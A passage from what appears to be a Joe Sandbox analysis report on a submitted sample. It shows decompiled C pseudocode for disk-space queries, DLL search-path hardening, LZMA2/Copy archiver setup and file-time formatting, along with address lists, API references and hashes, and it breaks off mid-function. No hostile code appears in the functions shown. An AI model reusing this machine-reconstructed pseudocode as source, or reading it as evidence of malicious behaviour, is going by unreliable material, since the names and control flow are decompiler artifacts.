				_v12 = __ecx;
				_t37 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetDiskFreeSpaceExW");
				_t61 = _a8;
				_t54 = _a4;
				if(_t37 != 0) {
					_t49 =  *_t37(_v12,  &_v52,  &_v36,  &_v44);
					 *_t54 = _v36;
					 *(_t54 + 4) = _v32;
					 *_t61 = _v44;
					_v5 = _t49 != 0;
					 *(_t61 + 4) = _v40;
				}
				if(GetDiskFreeSpaceW(_v12,  &_v16,  &_v20,  &_v28,  &_v24) != 0) {
					_t43 = _v16;
					_t60 = _t43 * _v20 >> 0x20;
					 *_t62 = _t43 * _v20;
					_t62[1] = _t60;
					if(_v5 == 0) {
						 *_t54 = E0041F4B0(_v24, 0,  *_t62, _t60);
						 *(_t54 + 4) = _t60;
						 *_t61 = E0041F4B0(_v28, 0,  *_t62, _t62[1]);
						 *(_t61 + 4) = _t60;
					}
					return 1;
				} else {
					return 0;
				}
			}





















                                                                                                    0x003b8f2e
                                                                                                    0x003b8f3a
                                                                                                    0x003b8f3c
                                                                                                    0x003b8f4b
                                                                                                    0x003b8f51
                                                                                                    0x003b8f54
                                                                                                    0x003b8f59
                                                                                                    0x003b8f6a
                                                                                                    0x003b8f71
                                                                                                    0x003b8f76
                                                                                                    0x003b8f7c
                                                                                                    0x003b8f81
                                                                                                    0x003b8f85
                                                                                                    0x003b8f85
                                                                                                    0x003b8fa3
                                                                                                    0x003b8fa9
                                                                                                    0x003b8fac
                                                                                                    0x003b8fb3
                                                                                                    0x003b8fb5
                                                                                                    0x003b8fb8
                                                                                                    0x003b8fc7
                                                                                                    0x003b8fc9
                                                                                                    0x003b8fdb
                                                                                                    0x003b8fdd
                                                                                                    0x003b8fdd
                                                                                                    0x00000000
                                                                                                    0x003b8fa5
                                                                                                    0x00000000
                                                                                                    0x003b8fa5

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetDiskFreeSpaceExW,74651190,00000002,00000000,?,?,?,?,?,?,003B76A6,003B1AD1,003B7814,?,00000002), ref: 003B8F44
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 003B8F4B
                                                                                                    • GetDiskFreeSpaceW.KERNEL32(00000002,?,003B7814,003B76A6,003B1AD1,?,?,?,?,?,?,003B76A6,003B1AD1,003B7814,?,00000002), ref: 003B8F9B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressDiskFreeHandleModuleProcSpace
                                                                                                    • String ID: GetDiskFreeSpaceExW$kernel32.dll$Net
                                                                                                    • API String ID: 1197914913-2965126902
                                                                                                    • Opcode ID: 415c8a3d6b629686f94f5e4fda917b96776a95ff083081fb9bb329f864ebf312
                                                                                                    • Instruction ID: aea9b2ad50d3afa2ea6f448b9c676a0f12bb158a88f49d51530b7fd7865a397f
                                                                                                    • Opcode Fuzzy Hash: 415c8a3d6b629686f94f5e4fda917b96776a95ff083081fb9bb329f864ebf312
                                                                                                    • Instruction Fuzzy Hash: 752128B2A00209AFDB11CF94CC45FEEBBF8FF48304F14846AE555A7251E734A955CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041D2A0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 13libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 68%
                                                                                                    			E0041D2A0() {
				_Unknown_base(*)()* _t1;

				_t1 = GetVersion();
				if(_t1 != 6) {
					_t1 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetDefaultDllDirectories");
					if(_t1 != 0) {
						return  *_t1(0xc00);
					}
				}
				return _t1;
			}




                                                                                                    0x0041d2a0
                                                                                                    0x0041d2aa
                                                                                                    0x0041d2bd
                                                                                                    0x0041d2c5
                                                                                                    0x00000000
                                                                                                    0x0041d2cc
                                                                                                    0x0041d2c5
                                                                                                    0x0041d2ce

                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(003EB113), ref: 0041D2A0
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,SetDefaultDllDirectories), ref: 0041D2B6
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041D2BD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProcVersion
                                                                                                    • String ID: SetDefaultDllDirectories$kernel32.dll$Net
                                                                                                    • API String ID: 3310240892-1613846457
                                                                                                    • Opcode ID: d197a66e63858f50d2ff86878e0f2ec269771d05f6bd161f753c13fb798a94bd
                                                                                                    • Instruction ID: 636134551d6d3af9e3e3ec7af435629510547599a038cd9373a7e7cf5e00d445
                                                                                                    • Opcode Fuzzy Hash: d197a66e63858f50d2ff86878e0f2ec269771d05f6bd161f753c13fb798a94bd
                                                                                                    • Instruction Fuzzy Hash: 59C01274B40216AAE72027B5AD0FB5625265B00B03FD04072B415D10D1CA7CCC52C63D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003F9348 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 333COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 94%
                                                                                                    			E003F9348(intOrPtr __ecx, void* __eflags) {
				void* __ebx;
				char* _t136;
				void* _t144;
				signed int _t146;
				void* _t148;
				void* _t149;
				intOrPtr _t150;
				signed int _t152;
				intOrPtr _t154;
				void* _t156;
				void* _t157;
				intOrPtr _t160;
				signed int _t161;
				signed int _t164;
				unsigned int _t165;
				void* _t166;
				void* _t171;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t185;
				intOrPtr* _t186;
				void* _t187;
				intOrPtr _t190;
				unsigned int _t193;
				signed int _t205;
				void* _t207;
				signed int _t208;
				void* _t209;
				void* _t217;
				intOrPtr _t220;
				char* _t221;
				void* _t223;
				signed int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				void* _t233;
				signed int _t235;
				signed int _t236;
				void* _t239;
				signed int _t240;
				intOrPtr _t243;
				void* _t244;
				intOrPtr _t246;
				signed int _t247;
				unsigned int _t248;
				void* _t250;
				signed int _t271;
				signed int _t281;
				void* _t287;
				void* _t289;
				signed int _t297;
				signed int _t300;
				signed int _t303;
				void* _t306;
				signed int _t312;

				E0041F1B0(E00427760, _t250);
				_t193 =  *(_t250 + 8);
				_t243 = __ecx;
				 *((intOrPtr*)(_t250 - 0x18)) = __ecx;
				E003F6959(_t193 + 0xc, __ecx + 0x210);
				_push(__ecx + 0x4c);
				E003FAA7B(_t250 - 0x50);
				_t235 = 0;
				 *(_t250 - 4) = 0;
				if( *((intOrPtr*)(_t250 - 0x4c)) <= 0) {
					L4:
					_t236 = 0;
					_t259 =  *((intOrPtr*)(_t250 - 0x4c));
					if( *((intOrPtr*)(_t250 - 0x4c)) != 0) {
						L9:
						if( *((intOrPtr*)(_t243 + 0x68)) == _t236) {
							L14:
							 *(_t250 - 0xd) =  *(_t250 - 0xd) & 0x00000000;
							_t266 =  *((intOrPtr*)(_t250 - 0x4c)) - _t236;
							 *(_t250 - 0x1c) = _t236;
							if( *((intOrPtr*)(_t250 - 0x4c)) <= _t236) {
								L90:
								_t136 = _t243 + 0x90;
								if( *((char*)(_t243 + 0x90)) == 0) {
									 *(_t243 + 0x88) = _t236;
									if( *(_t250 - 0xd) == 0) {
										 *(_t243 + 0x8c) = _t236;
									} else {
										 *(_t243 + 0x8c) = 1;
									}
								}
								 *_t136 = 1;
								_t244 = 0;
								L96:
								 *(_t250 - 4) =  *(_t250 - 4) | 0xffffffff;
								E003D6019(_t193, _t250 - 0x50);
								 *[fs:0x0] =  *((intOrPtr*)(_t250 - 0xc));
								return _t244;
							} else {
								goto L15;
							}
							do {
								L15:
								_t238 =  *((intOrPtr*)( *((intOrPtr*)(_t250 - 0x50)) +  *(_t250 - 0x1c) * 4));
								 *((intOrPtr*)(_t250 - 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t250 - 0x50)) +  *(_t250 - 0x1c) * 4));
								E003EF4DA( *((intOrPtr*)(_t250 - 0x18)) + 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t250 - 0x50)) +  *(_t250 - 0x1c) * 4)));
								 *((char*)(_t250 + 0xb)) = L003BDCC6( *((intOrPtr*)( *((intOrPtr*)(_t250 - 0x50)) +  *(_t250 - 0x1c) * 4)), _t266) >= 0;
								_t268 =  *((char*)(_t250 + 0xb));
								if( *((char*)(_t250 + 0xb)) == 0) {
									E003EF513();
								}
								_t246 = E003FAAEA(_t193, _t268);
								 *((intOrPtr*)(_t250 - 0x20)) = _t246;
								_t144 = E003F9248(_t246, _t238);
								if(_t144 != 0) {
									_t244 = _t144;
									goto L96;
								}
								_t205 =  *(_t246 + 0x14);
								 *((char*)(_t246 + 0x24)) = 1;
								 *(_t246 + 0x20) =  *(_t193 + 0x1c);
								_t146 =  *(_t246 + 0x10);
								_t225 = _t146 | _t205;
								if(_t225 != 0) {
									 *(_t250 - 0xd) = 1;
								}
								_t271 = _t205;
								if(_t271 <= 0 && (_t271 < 0 || _t146 <= 0x40202)) {
									_t148 = _t146 - 0x21;
									if(_t148 == 0) {
										L34:
										_t149 = L003BDBB3( *((intOrPtr*)(_t250 - 0x14)), __eflags);
										L35:
										_t239 = _t149;
										_t247 = _t225;
										L36:
										_t150 =  *((intOrPtr*)(_t250 - 0x20));
										if( *((intOrPtr*)(_t150 + 0x10)) != 0x21 ||  *((intOrPtr*)(_t150 + 0x14)) != 0) {
											_t207 = 7;
											_t227 = _t247;
											_t152 = E0041F4F0(_t239, _t207, _t227);
											__eflags = _t227 - 1;
											_t240 = _t152;
											 *(_t250 - 0x38) = _t227;
											if(__eflags < 0) {
												goto L82;
											}
											if(__eflags > 0) {
												L81:
												_t240 = 0;
												__eflags = 0;
												 *(_t250 - 0x38) = 1;
												goto L82;
											}
											__eflags = _t240;
											if(_t240 <= 0) {
												goto L82;
											}
											goto L81;
										} else {
											_t209 = 2;
											_t228 = _t247;
											_t156 = E0041F4F0(_t239, _t209, _t228);
											_t281 = _t228;
											if(_t281 > 0) {
												L44:
												_t157 = 0x10000000;
												_t229 = 0;
												L45:
												_t287 = _t229 - _t247;
												if(_t287 > 0) {
													L49:
													asm("adc edx, 0x0");
													_t240 = E0041F4B0(_t157 + 0xfffff, _t229, 0x40, 0) & 0xfc000000;
													 *(_t250 - 0x38) = _t229;
													_t160 = L003F38F6(_t229, _t288);
													 *((intOrPtr*)(_t250 - 0x2c)) = _t160;
													_t161 = 4;
													 *(_t250 - 0x28) = _t229;
													_t289 =  *(_t250 - 0x38) - _t161;
													if(_t289 >= 0 && (_t289 > 0 || _t240 > 0)) {
														_t240 = 0;
														 *(_t250 - 0x38) = _t161;
													}
													 *( *((intOrPtr*)(_t250 - 0x20)) + 0x24) =  *( *((intOrPtr*)(_t250 - 0x20)) + 0x24) & 0x00000000;
													if( *((char*)(_t250 + 0xb)) != 0 ||  *((char*)(_t193 + 0x20)) != 0) {
														L82:
														if( *((char*)( *((intOrPtr*)(_t250 - 0x18)) + 0x90)) == 0) {
															_t208 =  *(_t250 - 0x38);
															_t312 = _t208;
															if(_t312 <= 0 && (_t312 < 0 || _t240 < 0x1000000)) {
																_t240 = 0x1000000;
																_t208 = 0;
															}
															_t154 =  *((intOrPtr*)(_t250 - 0x18));
															 *(_t154 + 0x88) = _t240;
															 *(_t154 + 0x8c) = _t208;
															 *((char*)(_t154 + 0x90)) = 1;
														}
														goto L88;
													} else {
														_t294 =  *((char*)(_t193 + 0x30));
														if( *((char*)(_t193 + 0x30)) == 0) {
															goto L82;
														}
														 *(_t250 - 0x24) = L003BDC99( *((intOrPtr*)(_t250 - 0x14)), _t294);
														_t164 =  *(_t193 + 0x1c);
														_t165 = _t164 /  *(_t250 - 0x24);
														_t231 = _t164 %  *(_t250 - 0x24);
														_t295 = _t165 - 1;
														 *(_t250 + 8) = _t165;
														if(_t165 <= 1) {
															goto L82;
														}
														_t248 = _t165;
														_t166 = L003BDB09( *((intOrPtr*)(_t250 - 0x14)), _t231, _t295, 0);
														asm("adc edx, [ebp-0x28]");
														 *((intOrPtr*)(_t250 - 0x44)) = _t166 +  *((intOrPtr*)(_t250 - 0x2c));
														 *(_t250 - 0x40) = _t231;
														while(1) {
															 *((intOrPtr*)(_t250 - 0x34)) = E0041F4B0(_t248, 0,  *((intOrPtr*)(_t250 - 0x44)),  *(_t250 - 0x40));
															_t297 =  *(_t250 - 0x28);
															 *(_t250 - 0x30) = _t231;
															_t171 = (_t248 >> 3) + _t248 + 1;
															if(_t297 <= 0) {
																if(_t297 < 0 ||  *((intOrPtr*)(_t250 - 0x2c)) < 0x4000000) {
																	_t171 = _t171 + 1;
																}
																_t300 =  *(_t250 - 0x28);
																if(_t300 <= 0) {
																	if(_t300 < 0 ||  *((intOrPtr*)(_t250 - 0x2c)) < 0x1000000) {
																		_t171 = _t171 + 1;
																	}
																	_t303 =  *(_t250 - 0x28);
																	if(_t303 <= 0 && (_t303 < 0 ||  *((intOrPtr*)(_t250 - 0x2c)) < 0x400000)) {
																		_t171 = _t171 + 1;
																	}
																}
															}
															 *((intOrPtr*)(_t250 - 0x34)) =  *((intOrPtr*)(_t250 - 0x34)) + E0041F4B0(_t171, 0,  *((intOrPtr*)(_t250 - 0x2c)),  *(_t250 - 0x28));
															asm("adc [ebp-0x30], edx");
															_t306 =  *(_t250 - 0x30) -  *((intOrPtr*)(_t193 + 0x2c));
															if(_t306 < 0 || _t306 <= 0 &&  *((intOrPtr*)(_t250 - 0x34)) <=  *((intOrPtr*)(_t193 + 0x28))) {
																break;
															}
															_t248 = _t248 - 1;
															if(_t248 > 1) {
																continue;
															}
															break;
														}
														if(_t248 == 0) {
															_t248 = 1;
														}
														if(_t248 !=  *(_t250 + 8)) {
															E003EF51D();
														}
														goto L82;
													}
												}
												if(_t287 < 0) {
													L48:
													_t157 = _t239;
													_t229 = _t247;
													goto L49;
												}
												_t288 = _t157 - _t239;
												if(_t157 >= _t239) {
													goto L49;
												}
												goto L48;
											}
											if(_t281 < 0 || _t156 < 0x100000) {
												_t157 = 0x100000;
												_t229 = 0;
											}
											if(_t229 > 0 || _t157 > 0x10000000) {
												goto L44;
											} else {
												goto L45;
											}
										}
									}
									_t176 = _t148 - 0x300e0;
									if(_t176 == 0) {
										goto L34;
									}
									_t177 = _t176 - 0x300;
									if(_t177 == 0) {
										_t149 = L003F97A6( *((intOrPtr*)(_t250 - 0x14)), __eflags);
										goto L35;
									}
									_t178 = _t177 - 0xfd07;
									if(_t178 == 0) {
										_t239 = 0x8000;
										L30:
										_t247 = 0;
										goto L36;
									}
									_t179 = _t178 - 1;
									if(_t179 == 0) {
										_t239 = 0x10000;
										goto L30;
									}
									_t278 = _t179 != 0xf9;
									if(_t179 != 0xf9) {
										goto L88;
									}
									_t239 = L003F9749( *((intOrPtr*)(_t250 - 0x14)), _t278);
									goto L30;
								}
								L88:
								 *(_t250 - 0x1c) =  *(_t250 - 0x1c) + 1;
							} while ( *(_t250 - 0x1c) <  *((intOrPtr*)(_t250 - 0x4c)));
							_t243 =  *((intOrPtr*)(_t250 - 0x18));
							_t236 = 0;
							goto L90;
						}
						_t217 = 0;
						if( *((intOrPtr*)(_t193 + 0x10)) <= _t236) {
							L13:
							_push(_t243 + 0x58);
							_push(_t236);
							L003D5FCA(_t250 - 0x50, _t265);
							 *((char*)(_t193 + 0x19)) = 1;
							goto L14;
						} else {
							_t233 = 0;
							do {
								_t185 = _t233;
								_t233 = _t233 + 0xc;
								_t186 = _t185 +  *((intOrPtr*)(_t193 + 0xc));
								 *((intOrPtr*)(_t186 + 8)) =  *((intOrPtr*)(_t186 + 8)) + 1;
								 *_t186 =  *_t186 + 1;
								_t217 = _t217 + 1;
								_t265 = _t217 -  *((intOrPtr*)(_t193 + 0x10));
							} while (_t217 <  *((intOrPtr*)(_t193 + 0x10)));
							goto L13;
						}
					}
					_t187 = L003EF93F(_t250 - 0x50, _t259);
					_t220 =  *((intOrPtr*)(_t243 + 0x40));
					if(_t220 == 0xffffffff) {
						L7:
						_t221 = 0x42e990;
						L8:
						_t18 = _t187 + 0xc; // 0xc
						E003B2711(_t18, _t221);
						 *((char*)(_t193 + 0x18)) = 1;
						goto L9;
					}
					_t221 = "Copy";
					if(_t220 == 0) {
						goto L8;
					}
					goto L7;
				} else {
					goto L1;
				}
				do {
					L1:
					_t190 =  *((intOrPtr*)( *((intOrPtr*)(_t250 - 0x50)) + _t235 * 4));
					_t223 = _t190 + 0xc;
					if( *((intOrPtr*)(_t190 + 0x10)) == 0) {
						E003B2711(_t223, "LZMA2");
					}
					_t235 = _t235 + 1;
				} while (_t235 <  *((intOrPtr*)(_t250 - 0x4c)));
				goto L4;
			}






























































                                                                                                    0x003f934d
                                                                                                    0x003f9356
                                                                                                    0x003f935a
                                                                                                    0x003f9366
                                                                                                    0x003f936a
                                                                                                    0x003f9375
                                                                                                    0x003f9376
                                                                                                    0x003f937b
                                                                                                    0x003f9380
                                                                                                    0x003f9383
                                                                                                    0x003f93a4
                                                                                                    0x003f93a4
                                                                                                    0x003f93a6
                                                                                                    0x003f93a9
                                                                                                    0x003f93d6
                                                                                                    0x003f93d9
                                                                                                    0x003f9408
                                                                                                    0x003f9408
                                                                                                    0x003f940c
                                                                                                    0x003f940f
                                                                                                    0x003f9412
                                                                                                    0x003f96f4
                                                                                                    0x003f96fb
                                                                                                    0x003f9701
                                                                                                    0x003f9707
                                                                                                    0x003f970d
                                                                                                    0x003f971f
                                                                                                    0x003f970f
                                                                                                    0x003f970f
                                                                                                    0x003f970f
                                                                                                    0x003f970d
                                                                                                    0x003f9725
                                                                                                    0x003f9728
                                                                                                    0x003f972a
                                                                                                    0x003f972a
                                                                                                    0x003f9731
                                                                                                    0x003f973e
                                                                                                    0x003f9746
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f9418
                                                                                                    0x003f9418
                                                                                                    0x003f941e
                                                                                                    0x003f9425
                                                                                                    0x003f942b
                                                                                                    0x003f9439
                                                                                                    0x003f943d
                                                                                                    0x003f9441
                                                                                                    0x003f9448
                                                                                                    0x003f9448
                                                                                                    0x003f9457
                                                                                                    0x003f945b
                                                                                                    0x003f945e
                                                                                                    0x003f9465
                                                                                                    0x003f971b
                                                                                                    0x00000000
                                                                                                    0x003f971b
                                                                                                    0x003f946b
                                                                                                    0x003f946e
                                                                                                    0x003f9475
                                                                                                    0x003f9478
                                                                                                    0x003f947d
                                                                                                    0x003f947f
                                                                                                    0x003f9481
                                                                                                    0x003f9481
                                                                                                    0x003f9485
                                                                                                    0x003f9487
                                                                                                    0x003f949a
                                                                                                    0x003f949d
                                                                                                    0x003f94e8
                                                                                                    0x003f94eb
                                                                                                    0x003f94f0
                                                                                                    0x003f94f0
                                                                                                    0x003f94f2
                                                                                                    0x003f94f4
                                                                                                    0x003f94f4
                                                                                                    0x003f94fb
                                                                                                    0x003f9685
                                                                                                    0x003f9686
                                                                                                    0x003f9688
                                                                                                    0x003f968d
                                                                                                    0x003f9690
                                                                                                    0x003f9692
                                                                                                    0x003f9695
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f9697
                                                                                                    0x003f969d
                                                                                                    0x003f969d
                                                                                                    0x003f969d
                                                                                                    0x003f969f
                                                                                                    0x00000000
                                                                                                    0x003f969f
                                                                                                    0x003f9699
                                                                                                    0x003f969b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f950b
                                                                                                    0x003f950f
                                                                                                    0x003f9510
                                                                                                    0x003f9512
                                                                                                    0x003f9517
                                                                                                    0x003f9519
                                                                                                    0x003f9536
                                                                                                    0x003f9536
                                                                                                    0x003f953b
                                                                                                    0x003f953d
                                                                                                    0x003f953d
                                                                                                    0x003f953f
                                                                                                    0x003f954b
                                                                                                    0x003f9552
                                                                                                    0x003f9563
                                                                                                    0x003f9569
                                                                                                    0x003f956c
                                                                                                    0x003f9573
                                                                                                    0x003f9576
                                                                                                    0x003f9577
                                                                                                    0x003f957a
                                                                                                    0x003f957d
                                                                                                    0x003f9585
                                                                                                    0x003f9587
                                                                                                    0x003f9587
                                                                                                    0x003f958d
                                                                                                    0x003f9595
                                                                                                    0x003f96a6
                                                                                                    0x003f96b0
                                                                                                    0x003f96b2
                                                                                                    0x003f96b5
                                                                                                    0x003f96b7
                                                                                                    0x003f96c3
                                                                                                    0x003f96c8
                                                                                                    0x003f96c8
                                                                                                    0x003f96ca
                                                                                                    0x003f96cd
                                                                                                    0x003f96d3
                                                                                                    0x003f96d9
                                                                                                    0x003f96d9
                                                                                                    0x00000000
                                                                                                    0x003f95a5
                                                                                                    0x003f95a5
                                                                                                    0x003f95a9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f95b7
                                                                                                    0x003f95ba
                                                                                                    0x003f95bf
                                                                                                    0x003f95bf
                                                                                                    0x003f95c2
                                                                                                    0x003f95c5
                                                                                                    0x003f95c8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f95d3
                                                                                                    0x003f95d5
                                                                                                    0x003f95dd
                                                                                                    0x003f95e0
                                                                                                    0x003f95e3
                                                                                                    0x003f95e6
                                                                                                    0x003f95f4
                                                                                                    0x003f95fc
                                                                                                    0x003f9600
                                                                                                    0x003f9603
                                                                                                    0x003f9607
                                                                                                    0x003f9609
                                                                                                    0x003f9614
                                                                                                    0x003f9614
                                                                                                    0x003f9615
                                                                                                    0x003f9619
                                                                                                    0x003f961b
                                                                                                    0x003f9626
                                                                                                    0x003f9626
                                                                                                    0x003f9627
                                                                                                    0x003f962b
                                                                                                    0x003f9638
                                                                                                    0x003f9638
                                                                                                    0x003f962b
                                                                                                    0x003f9619
                                                                                                    0x003f9647
                                                                                                    0x003f964a
                                                                                                    0x003f9650
                                                                                                    0x003f9653
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f965f
                                                                                                    0x003f9663
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f9663
                                                                                                    0x003f9667
                                                                                                    0x003f966b
                                                                                                    0x003f966b
                                                                                                    0x003f966f
                                                                                                    0x003f967a
                                                                                                    0x003f967a
                                                                                                    0x00000000
                                                                                                    0x003f966f
                                                                                                    0x003f9595
                                                                                                    0x003f9541
                                                                                                    0x003f9547
                                                                                                    0x003f9547
                                                                                                    0x003f9549
                                                                                                    0x00000000
                                                                                                    0x003f9549
                                                                                                    0x003f9543
                                                                                                    0x003f9545
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f9545
                                                                                                    0x003f951b
                                                                                                    0x003f9524
                                                                                                    0x003f9529
                                                                                                    0x003f9529
                                                                                                    0x003f952d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f952d
                                                                                                    0x003f94fb
                                                                                                    0x003f949f
                                                                                                    0x003f94a4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f94a6
                                                                                                    0x003f94ab
                                                                                                    0x003f94e1
                                                                                                    0x00000000
                                                                                                    0x003f94e1
                                                                                                    0x003f94ad
                                                                                                    0x003f94b2
                                                                                                    0x003f94d7
                                                                                                    0x003f94cc
                                                                                                    0x003f94cc
                                                                                                    0x00000000
                                                                                                    0x003f94cc
                                                                                                    0x003f94b4
                                                                                                    0x003f94b5
                                                                                                    0x003f94d0
                                                                                                    0x00000000
                                                                                                    0x003f94d0
                                                                                                    0x003f94b7
                                                                                                    0x003f94bc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f94ca
                                                                                                    0x00000000
                                                                                                    0x003f94ca
                                                                                                    0x003f96e0
                                                                                                    0x003f96e0
                                                                                                    0x003f96e6
                                                                                                    0x003f96ef
                                                                                                    0x003f96f2
                                                                                                    0x00000000
                                                                                                    0x003f96f2
                                                                                                    0x003f93db
                                                                                                    0x003f93e0
                                                                                                    0x003f93f7
                                                                                                    0x003f93fd
                                                                                                    0x003f93fe
                                                                                                    0x003f93ff
                                                                                                    0x003f9404
                                                                                                    0x00000000
                                                                                                    0x003f93e2
                                                                                                    0x003f93e2
                                                                                                    0x003f93e4
                                                                                                    0x003f93e4
                                                                                                    0x003f93e6
                                                                                                    0x003f93e9
                                                                                                    0x003f93ec
                                                                                                    0x003f93ef
                                                                                                    0x003f93f1
                                                                                                    0x003f93f2
                                                                                                    0x003f93f2
                                                                                                    0x00000000
                                                                                                    0x003f93e4
                                                                                                    0x003f93e0
                                                                                                    0x003f93ae
                                                                                                    0x003f93b3
                                                                                                    0x003f93b9
                                                                                                    0x003f93c4
                                                                                                    0x003f93c4
                                                                                                    0x003f93c9
                                                                                                    0x003f93ca
                                                                                                    0x003f93cd
                                                                                                    0x003f93d2
                                                                                                    0x00000000
                                                                                                    0x003f93d2
                                                                                                    0x003f93bd
                                                                                                    0x003f93c2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f9385
                                                                                                    0x003f9385
                                                                                                    0x003f9388
                                                                                                    0x003f938f
                                                                                                    0x003f9392
                                                                                                    0x003f9399
                                                                                                    0x003f9399
                                                                                                    0x003f939e
                                                                                                    0x003f939f
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003F934D
                                                                                                      • Part of subcall function 003FAA7B: __EH_prolog.LIBCMT ref: 003FAA80
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: Copy$LZMA2
                                                                                                    • API String ID: 3519838083-1006940721
                                                                                                    • Opcode ID: b5c01b260fd7c7bb71e44566a3c27f9e015c6190921592cc4552575ec585a24f
                                                                                                    • Instruction ID: 78186f6429ddc3bb76a788f38a095de97e5dd09746e0ded2fc7f7f9d33238e56
                                                                                                    • Opcode Fuzzy Hash: b5c01b260fd7c7bb71e44566a3c27f9e015c6190921592cc4552575ec585a24f
                                                                                                    • Instruction Fuzzy Hash: 63D1C271E002088FDF27DFA9C481BBEB7B6AF94314F16806BE605AB285D7749885CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B9436 Relevance: 4.7, APIs: 3, Instructions: 201timeCOMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 83%
                                                                                                    			E003B9436(FILETIME* __ecx, signed int __edx, signed int _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				struct _FILETIME _v20;
				struct _SYSTEMTIME _v36;
				signed int _t148;
				signed int _t151;
				void* _t183;
				signed int _t201;
				signed int _t204;
				void* _t210;
				intOrPtr _t211;
				signed int _t258;
				signed int _t259;
				signed char* _t262;
				signed char* _t263;
				signed char* _t264;
				signed char* _t265;
				signed char* _t266;
				signed char* _t267;

				_t262 = _a4;
				_v12 = __edx;
				 *_t262 =  *_t262 & 0x00000000;
				if(FileTimeToLocalFileTime(__ecx,  &_v20) == 0 || FileTimeToSystemTime( &_v20,  &_v36) == 0) {
					return 0;
				}
				_t258 = _v36.wYear & 0x0000ffff;
				_a4 = _t258;
				if(_t258 >= 0x2710) {
					 *_t262 = _t258 / 0x2710 + 0x30;
					_t262 =  &(_t262[1]);
					_t258 = _t258 % 0x2710;
